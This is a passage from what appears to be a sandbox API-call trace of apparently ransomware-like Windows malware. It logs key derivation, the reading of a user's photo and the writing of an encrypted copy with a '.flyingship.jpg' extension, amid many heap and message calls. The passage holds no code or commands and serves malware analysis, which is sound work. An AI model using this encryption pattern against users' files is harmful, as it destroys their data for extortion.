lpMsg=0x87ee3c) returned 0 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.455] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.455] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.455] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.456] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0190.456] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.456] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.456] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.456] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.456] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.456] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.456] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0190.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.456] CryptDestroyHash (hHash=0x90ae18) returned 1 [0190.456] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.457] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\f2jfy_.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.458] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.458] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0190.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0190.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0190.460] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh")) returned 0x10 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0190.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.flyingship.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\f2jfy_.flyingship.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0190.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0190.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0190.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0190.463] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0190.463] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa27d, lpOverlapped=0x0) returned 1 [0190.465] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0190.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa27d) returned 0xbea018 [0190.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0190.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0190.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa27d) returned 0xbf42a0 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.467] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa27d) returned 0xbea018 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.467] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0190.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.468] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa27d) returned 0xbea018 [0190.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0190.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa27d) returned 0xbfe528 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 